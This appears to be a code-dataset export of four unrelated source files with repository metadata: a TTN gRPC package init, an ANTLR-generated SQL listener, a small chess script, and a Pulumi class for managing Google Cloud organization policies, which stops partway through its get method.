theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 32
|
2017-11-01T16:03:48.000Z
|
2021-11-16T12:35:34.000Z
|
theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 28
|
2017-11-20T09:45:59.000Z
|
2021-12-14T09:31:24.000Z
|
theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/networkserver/__init__.py
|
emirgo/WeatherStation
|
f0f8c3464470991fc962d83cea20f3bcfd6a04b6
|
[
"MIT"
] | 22
|
2017-11-03T10:21:50.000Z
|
2021-04-08T05:20:51.000Z
|
from .networkserver_pb2_grpc import *
from .networkserver_pb2 import *
| 23.666667
| 37
| 0.830986
| 9
| 71
| 6.222222
| 0.555556
| 0.607143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0.112676
| 71
| 2
| 38
| 35.5
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
53f2d949c65ee54393a2e4a95412be97655c2ddd
| 9,102
|
py
|
Python
|
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | 1
|
2017-04-02T01:52:57.000Z
|
2017-04-02T01:52:57.000Z
|
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | null | null | null |
Front-end/antlr/SQLGramaticaListener.py
|
cor14095/probases1
|
0e99fde61108379a22339603f94238aa81808968
|
[
"MIT"
] | null | null | null |
# Generated from gramatica/SQLGramatica.g4 by ANTLR 4.7
from antlr4 import *
class SQLGramaticaListener(ParseTreeListener):
    """Complete listener for parse trees produced by SQLGramaticaParser.

    Every enter/exit callback below is a deliberate no-op: subclass this
    listener and override only the callbacks you care about.  The file is
    generated by ANTLR 4.7 from gramatica/SQLGramatica.g4, so the method
    names and signatures must not change.
    """

    # -- SQLGramaticaParser#literal --
    def enterLiteral(self, ctx):
        pass

    def exitLiteral(self, ctx):
        pass

    # -- SQLGramaticaParser#fecha --
    def enterFecha(self, ctx):
        pass

    def exitFecha(self, ctx):
        pass

    # -- SQLGramaticaParser#programa --
    def enterPrograma(self, ctx):
        pass

    def exitPrograma(self, ctx):
        pass

    # -- SQLGramaticaParser#database --
    def enterDatabase(self, ctx):
        pass

    def exitDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#createDatabase --
    def enterCreateDatabase(self, ctx):
        pass

    def exitCreateDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#alterDatabase --
    def enterAlterDatabase(self, ctx):
        pass

    def exitAlterDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#dropDatabase --
    def enterDropDatabase(self, ctx):
        pass

    def exitDropDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#showDatabase --
    def enterShowDatabase(self, ctx):
        pass

    def exitShowDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#useDatabase --
    def enterUseDatabase(self, ctx):
        pass

    def exitUseDatabase(self, ctx):
        pass

    # -- SQLGramaticaParser#opTable --
    def enterOpTable(self, ctx):
        pass

    def exitOpTable(self, ctx):
        pass

    # -- SQLGramaticaParser#tipo --
    def enterTipo(self, ctx):
        pass

    def exitTipo(self, ctx):
        pass

    # -- SQLGramaticaParser#createTable --
    def enterCreateTable(self, ctx):
        pass

    def exitCreateTable(self, ctx):
        pass

    # -- SQLGramaticaParser#constraint --
    def enterConstraint(self, ctx):
        pass

    def exitConstraint(self, ctx):
        pass

    # -- SQLGramaticaParser#primaryKey --
    def enterPrimaryKey(self, ctx):
        pass

    def exitPrimaryKey(self, ctx):
        pass

    # -- SQLGramaticaParser#foreignKey --
    def enterForeignKey(self, ctx):
        pass

    def exitForeignKey(self, ctx):
        pass

    # -- SQLGramaticaParser#check --
    def enterCheck(self, ctx):
        pass

    def exitCheck(self, ctx):
        pass

    # -- SQLGramaticaParser#exp --
    def enterExp(self, ctx):
        pass

    def exitExp(self, ctx):
        pass

    # -- SQLGramaticaParser#orExpression --
    def enterOrExpression(self, ctx):
        pass

    def exitOrExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#andExpression --
    def enterAndExpression(self, ctx):
        pass

    def exitAndExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#equalsExpression --
    def enterEqualsExpression(self, ctx):
        pass

    def exitEqualsExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#relationExpression --
    def enterRelationExpression(self, ctx):
        pass

    def exitRelationExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#addSubsExpression --
    def enterAddSubsExpression(self, ctx):
        pass

    def exitAddSubsExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#mulDivExpression --
    def enterMulDivExpression(self, ctx):
        pass

    def exitMulDivExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#basicExpression --
    def enterBasicExpression(self, ctx):
        pass

    def exitBasicExpression(self, ctx):
        pass

    # -- SQLGramaticaParser#alterTable --
    def enterAlterTable(self, ctx):
        pass

    def exitAlterTable(self, ctx):
        pass

    # -- SQLGramaticaParser#action --
    def enterAction(self, ctx):
        pass

    def exitAction(self, ctx):
        pass

    # -- SQLGramaticaParser#dropTable --
    def enterDropTable(self, ctx):
        pass

    def exitDropTable(self, ctx):
        pass

    # -- SQLGramaticaParser#showTables --
    def enterShowTables(self, ctx):
        pass

    def exitShowTables(self, ctx):
        pass

    # -- SQLGramaticaParser#showColumns --
    def enterShowColumns(self, ctx):
        pass

    def exitShowColumns(self, ctx):
        pass

    # -- SQLGramaticaParser#insertInto --
    def enterInsertInto(self, ctx):
        pass

    def exitInsertInto(self, ctx):
        pass

    # -- SQLGramaticaParser#updateSet --
    def enterUpdateSet(self, ctx):
        pass

    def exitUpdateSet(self, ctx):
        pass

    # -- SQLGramaticaParser#deleteFrom --
    def enterDeleteFrom(self, ctx):
        pass

    def exitDeleteFrom(self, ctx):
        pass

    # -- SQLGramaticaParser#selectFrom --
    def enterSelectFrom(self, ctx):
        pass

    def exitSelectFrom(self, ctx):
        pass

    # -- SQLGramaticaParser#sep --
    def enterSep(self, ctx):
        pass

    def exitSep(self, ctx):
        pass

    # -- SQLGramaticaParser#rel_op --
    def enterRel_op(self, ctx):
        pass

    def exitRel_op(self, ctx):
        pass

    # -- SQLGramaticaParser#eq_op --
    def enterEq_op(self, ctx):
        pass

    def exitEq_op(self, ctx):
        pass

    # -- SQLGramaticaParser#add_op --
    def enterAdd_op(self, ctx):
        pass

    def exitAdd_op(self, ctx):
        pass

    # -- SQLGramaticaParser#mult_op --
    def enterMult_op(self, ctx):
        pass

    def exitMult_op(self, ctx):
        pass
| 26.080229
| 89
| 0.690947
| 1,032
| 9,102
| 6.078488
| 0.140504
| 0.073649
| 0.122748
| 0.220947
| 0.807429
| 0.807429
| 0.801371
| 0.800574
| 0.652001
| 0.641798
| 0
| 0.000586
| 0.249506
| 9,102
| 348
| 90
| 26.155172
| 0.917728
| 0.518238
| 0
| 0.493506
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.493506
| false
| 0.493506
| 0.006494
| 0
| 0.506494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
53fe281b711789e1b1d841bfc17dcfa4d3417ad5
| 47
|
py
|
Python
|
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
chess_main.py
|
ChessGameGroup/chess_game
|
01d140d5b274bdd76a78e59b1d96c11b18ebc8d5
|
[
"MIT"
] | null | null | null |
from functions import print_grid


def main():
    """Entry point: render the chess board grid."""
    print_grid()


# Guard the entry point so importing this module does not draw the grid
# as a side effect; running it as a script behaves exactly as before.
if __name__ == "__main__":
    main()
| 11.75
| 32
| 0.829787
| 7
| 47
| 5.285714
| 0.714286
| 0.486486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12766
| 47
| 3
| 33
| 15.666667
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
072bee0fbeaad20da79672c991cb9ef1aa233107
| 28,424
|
py
|
Python
|
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/policy.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PolicyArgs', 'Policy']
@pulumi.input_type
class PolicyArgs:
    """Input arguments for constructing a Policy resource.

    NOTE(review): this file is generated by the Pulumi Terraform Bridge
    (per the file header); keep edits to documentation only.
    """

    def __init__(__self__, *,
                 constraint: pulumi.Input[str],
                 org_id: pulumi.Input[str],
                 boolean_policy: Optional[pulumi.Input['PolicyBooleanPolicyArgs']] = None,
                 list_policy: Optional[pulumi.Input['PolicyListPolicyArgs']] = None,
                 restore_policy: Optional[pulumi.Input['PolicyRestorePolicyArgs']] = None,
                 version: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a Policy resource.
        :param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        :param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
        :param pulumi.Input['PolicyBooleanPolicyArgs'] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        :param pulumi.Input['PolicyListPolicyArgs'] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        :param pulumi.Input['PolicyRestorePolicyArgs'] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
        :param pulumi.Input[int] version: Version of the Policy. Default version is 0.
        """
        # Required arguments are always recorded on the input object.
        pulumi.set(__self__, "constraint", constraint)
        pulumi.set(__self__, "org_id", org_id)
        # Optional arguments are recorded only when explicitly supplied.
        if boolean_policy is not None:
            pulumi.set(__self__, "boolean_policy", boolean_policy)
        if list_policy is not None:
            pulumi.set(__self__, "list_policy", list_policy)
        if restore_policy is not None:
            pulumi.set(__self__, "restore_policy", restore_policy)
        if version is not None:
            pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter
    def constraint(self) -> pulumi.Input[str]:
        """
        The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        """
        return pulumi.get(self, "constraint")

    @constraint.setter
    def constraint(self, value: pulumi.Input[str]):
        pulumi.set(self, "constraint", value)

    @property
    @pulumi.getter(name="orgId")
    def org_id(self) -> pulumi.Input[str]:
        """
        The numeric ID of the organization to set the policy for.
        """
        return pulumi.get(self, "org_id")

    @org_id.setter
    def org_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "org_id", value)

    @property
    @pulumi.getter(name="booleanPolicy")
    def boolean_policy(self) -> Optional[pulumi.Input['PolicyBooleanPolicyArgs']]:
        """
        A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        """
        return pulumi.get(self, "boolean_policy")

    @boolean_policy.setter
    def boolean_policy(self, value: Optional[pulumi.Input['PolicyBooleanPolicyArgs']]):
        pulumi.set(self, "boolean_policy", value)

    @property
    @pulumi.getter(name="listPolicy")
    def list_policy(self) -> Optional[pulumi.Input['PolicyListPolicyArgs']]:
        """
        A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        """
        return pulumi.get(self, "list_policy")

    @list_policy.setter
    def list_policy(self, value: Optional[pulumi.Input['PolicyListPolicyArgs']]):
        pulumi.set(self, "list_policy", value)

    @property
    @pulumi.getter(name="restorePolicy")
    def restore_policy(self) -> Optional[pulumi.Input['PolicyRestorePolicyArgs']]:
        """
        A restore policy is a constraint to restore the default policy. Structure is documented below.
        """
        return pulumi.get(self, "restore_policy")

    @restore_policy.setter
    def restore_policy(self, value: Optional[pulumi.Input['PolicyRestorePolicyArgs']]):
        pulumi.set(self, "restore_policy", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[int]]:
        """
        Version of the Policy. Default version is 0.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class _PolicyState:
    def __init__(__self__, *,
                 boolean_policy: Optional[pulumi.Input['PolicyBooleanPolicyArgs']] = None,
                 constraint: Optional[pulumi.Input[str]] = None,
                 etag: Optional[pulumi.Input[str]] = None,
                 list_policy: Optional[pulumi.Input['PolicyListPolicyArgs']] = None,
                 org_id: Optional[pulumi.Input[str]] = None,
                 restore_policy: Optional[pulumi.Input['PolicyRestorePolicyArgs']] = None,
                 update_time: Optional[pulumi.Input[str]] = None,
                 version: Optional[pulumi.Input[int]] = None):
        """
        Input properties used for looking up and filtering Policy resources.

        :param pulumi.Input['PolicyBooleanPolicyArgs'] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        :param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        :param pulumi.Input[str] etag: (Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
        :param pulumi.Input['PolicyListPolicyArgs'] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        :param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
        :param pulumi.Input['PolicyRestorePolicyArgs'] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
        :param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
        :param pulumi.Input[int] version: Version of the Policy. Default version is 0.
        """
        # All state properties are optional; record only the ones the caller
        # actually supplied so that unset properties remain absent.
        supplied = {
            "boolean_policy": boolean_policy,
            "constraint": constraint,
            "etag": etag,
            "list_policy": list_policy,
            "org_id": org_id,
            "restore_policy": restore_policy,
            "update_time": update_time,
            "version": version,
        }
        for prop_name, prop_value in supplied.items():
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter(name="booleanPolicy")
    def boolean_policy(self) -> Optional[pulumi.Input['PolicyBooleanPolicyArgs']]:
        """A boolean policy is a constraint that is either enforced or not. Structure is documented below."""
        stored = pulumi.get(self, "boolean_policy")
        return stored

    @boolean_policy.setter
    def boolean_policy(self, value: Optional[pulumi.Input['PolicyBooleanPolicyArgs']]):
        pulumi.set(self, "boolean_policy", value)

    @property
    @pulumi.getter
    def constraint(self) -> Optional[pulumi.Input[str]]:
        """The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints)."""
        stored = pulumi.get(self, "constraint")
        return stored

    @constraint.setter
    def constraint(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "constraint", value)

    @property
    @pulumi.getter
    def etag(self) -> Optional[pulumi.Input[str]]:
        """(Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other."""
        stored = pulumi.get(self, "etag")
        return stored

    @etag.setter
    def etag(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "etag", value)

    @property
    @pulumi.getter(name="listPolicy")
    def list_policy(self) -> Optional[pulumi.Input['PolicyListPolicyArgs']]:
        """A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below."""
        stored = pulumi.get(self, "list_policy")
        return stored

    @list_policy.setter
    def list_policy(self, value: Optional[pulumi.Input['PolicyListPolicyArgs']]):
        pulumi.set(self, "list_policy", value)

    @property
    @pulumi.getter(name="orgId")
    def org_id(self) -> Optional[pulumi.Input[str]]:
        """The numeric ID of the organization to set the policy for."""
        stored = pulumi.get(self, "org_id")
        return stored

    @org_id.setter
    def org_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "org_id", value)

    @property
    @pulumi.getter(name="restorePolicy")
    def restore_policy(self) -> Optional[pulumi.Input['PolicyRestorePolicyArgs']]:
        """A restore policy is a constraint to restore the default policy. Structure is documented below."""
        stored = pulumi.get(self, "restore_policy")
        return stored

    @restore_policy.setter
    def restore_policy(self, value: Optional[pulumi.Input['PolicyRestorePolicyArgs']]):
        pulumi.set(self, "restore_policy", value)

    @property
    @pulumi.getter(name="updateTime")
    def update_time(self) -> Optional[pulumi.Input[str]]:
        """(Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z"."""
        stored = pulumi.get(self, "update_time")
        return stored

    @update_time.setter
    def update_time(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "update_time", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[int]]:
        """Version of the Policy. Default version is 0."""
        stored = pulumi.get(self, "version")
        return stored

    @version.setter
    def version(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "version", value)
class Policy(pulumi.CustomResource):
    """Manages a Google Cloud organization policy as a Pulumi custom resource.

    Two constructor overloads are provided: keyword arguments, or a single
    ``PolicyArgs`` bundle; ``__init__`` dispatches to ``_internal_init`` either way.
    """

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
                 constraint: Optional[pulumi.Input[str]] = None,
                 list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
                 org_id: Optional[pulumi.Input[str]] = None,
                 restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
                 version: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        """
        Allows management of Organization policies for a Google Organization. For more information see
        [the official
        documentation](https://cloud.google.com/resource-manager/docs/organization-policy/overview) and
        [API](https://cloud.google.com/resource-manager/reference/rest/v1/organizations/setOrgPolicy).

        ## Example Usage

        To set policy with a [boolean constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-boolean-constraints):

        ```python
        import pulumi
        import pulumi_gcp as gcp

        serial_port_policy = gcp.organizations.Policy("serialPortPolicy",
            boolean_policy=gcp.organizations.PolicyBooleanPolicyArgs(
                enforced=True,
            ),
            constraint="compute.disableSerialPortAccess",
            org_id="123456789")
        ```

        To set a policy with a [list constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-list-constraints):

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            list_policy=gcp.organizations.PolicyListPolicyArgs(
                allow=gcp.organizations.PolicyListPolicyAllowArgs(
                    all=True,
                ),
            ),
            org_id="123456789")
        ```

        Or to deny some services, use the following instead:

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            list_policy=gcp.organizations.PolicyListPolicyArgs(
                deny=gcp.organizations.PolicyListPolicyDenyArgs(
                    values=["cloudresourcemanager.googleapis.com"],
                ),
                suggested_value="compute.googleapis.com",
            ),
            org_id="123456789")
        ```

        To restore the default organization policy, use the following instead:

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            org_id="123456789",
            restore_policy=gcp.organizations.PolicyRestorePolicyArgs(
                default=True,
            ))
        ```

        ## Import

        Organization Policies can be imported using the `org_id` and the `constraint`, e.g.

        ```sh
        $ pulumi import gcp:organizations/policy:Policy services_policy 123456789/constraints/serviceuser.services
        ```

        It is all right if the constraint contains a slash, as in the example above.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        :param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        :param pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        :param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
        :param pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
        :param pulumi.Input[int] version: Version of the Policy. Default version is 0.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: PolicyArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Allows management of Organization policies for a Google Organization. For more information see
        [the official
        documentation](https://cloud.google.com/resource-manager/docs/organization-policy/overview) and
        [API](https://cloud.google.com/resource-manager/reference/rest/v1/organizations/setOrgPolicy).

        ## Example Usage

        To set policy with a [boolean constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-boolean-constraints):

        ```python
        import pulumi
        import pulumi_gcp as gcp

        serial_port_policy = gcp.organizations.Policy("serialPortPolicy",
            boolean_policy=gcp.organizations.PolicyBooleanPolicyArgs(
                enforced=True,
            ),
            constraint="compute.disableSerialPortAccess",
            org_id="123456789")
        ```

        To set a policy with a [list constraint](https://cloud.google.com/resource-manager/docs/organization-policy/quickstart-list-constraints):

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            list_policy=gcp.organizations.PolicyListPolicyArgs(
                allow=gcp.organizations.PolicyListPolicyAllowArgs(
                    all=True,
                ),
            ),
            org_id="123456789")
        ```

        Or to deny some services, use the following instead:

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            list_policy=gcp.organizations.PolicyListPolicyArgs(
                deny=gcp.organizations.PolicyListPolicyDenyArgs(
                    values=["cloudresourcemanager.googleapis.com"],
                ),
                suggested_value="compute.googleapis.com",
            ),
            org_id="123456789")
        ```

        To restore the default organization policy, use the following instead:

        ```python
        import pulumi
        import pulumi_gcp as gcp

        services_policy = gcp.organizations.Policy("servicesPolicy",
            constraint="serviceuser.services",
            org_id="123456789",
            restore_policy=gcp.organizations.PolicyRestorePolicyArgs(
                default=True,
            ))
        ```

        ## Import

        Organization Policies can be imported using the `org_id` and the `constraint`, e.g.

        ```sh
        $ pulumi import gcp:organizations/policy:Policy services_policy 123456789/constraints/serviceuser.services
        ```

        It is all right if the constraint contains a slash, as in the example above.

        :param str resource_name: The name of the resource.
        :param PolicyArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Resolve which overload was used: get_resource_args_opts returns a
        # PolicyArgs instance when the args-bundle form was called, else None.
        resource_args, opts = _utilities.get_resource_args_opts(PolicyArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            # Args-bundle form: expand the bundle into keyword arguments.
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            # Keyword form: forward positional/keyword arguments unchanged.
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
                 constraint: Optional[pulumi.Input[str]] = None,
                 list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
                 org_id: Optional[pulumi.Input[str]] = None,
                 restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
                 version: Optional[pulumi.Input[int]] = None,
                 __props__=None):
        # Shared constructor body: validates options, builds the property bag
        # and registers the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (as opposed to looking up an existing one
            # by id): __props__ must not be supplied by the caller.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = PolicyArgs.__new__(PolicyArgs)

            __props__.__dict__["boolean_policy"] = boolean_policy
            # constraint and org_id are required unless resolving from a URN.
            if constraint is None and not opts.urn:
                raise TypeError("Missing required property 'constraint'")
            __props__.__dict__["constraint"] = constraint
            __props__.__dict__["list_policy"] = list_policy
            if org_id is None and not opts.urn:
                raise TypeError("Missing required property 'org_id'")
            __props__.__dict__["org_id"] = org_id
            __props__.__dict__["restore_policy"] = restore_policy
            __props__.__dict__["version"] = version
            # Output-only properties start as None; the engine fills them in.
            __props__.__dict__["etag"] = None
            __props__.__dict__["update_time"] = None
        super(Policy, __self__).__init__(
            'gcp:organizations/policy:Policy',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            boolean_policy: Optional[pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']]] = None,
            constraint: Optional[pulumi.Input[str]] = None,
            etag: Optional[pulumi.Input[str]] = None,
            list_policy: Optional[pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']]] = None,
            org_id: Optional[pulumi.Input[str]] = None,
            restore_policy: Optional[pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']]] = None,
            update_time: Optional[pulumi.Input[str]] = None,
            version: Optional[pulumi.Input[int]] = None) -> 'Policy':
        """
        Get an existing Policy resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['PolicyBooleanPolicyArgs']] boolean_policy: A boolean policy is a constraint that is either enforced or not. Structure is documented below.
        :param pulumi.Input[str] constraint: The name of the Constraint the Policy is configuring, for example, `serviceuser.services`. Check out the [complete list of available constraints](https://cloud.google.com/resource-manager/docs/organization-policy/understanding-constraints#available_constraints).
        :param pulumi.Input[str] etag: (Computed) The etag of the organization policy. `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other.
        :param pulumi.Input[pulumi.InputType['PolicyListPolicyArgs']] list_policy: A policy that can define specific values that are allowed or denied for the given constraint. It can also be used to allow or deny all values. Structure is documented below.
        :param pulumi.Input[str] org_id: The numeric ID of the organization to set the policy for.
        :param pulumi.Input[pulumi.InputType['PolicyRestorePolicyArgs']] restore_policy: A restore policy is a constraint to restore the default policy. Structure is documented below.
        :param pulumi.Input[str] update_time: (Computed) The timestamp in RFC3339 UTC "Zulu" format, accurate to nanoseconds, representing when the variable was last updated. Example: "2016-10-09T12:33:37.578138407Z".
        :param pulumi.Input[int] version: Version of the Policy. Default version is 0.
        """
        # Force the lookup id into the options, then hand the engine a state
        # bag describing any known property values.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

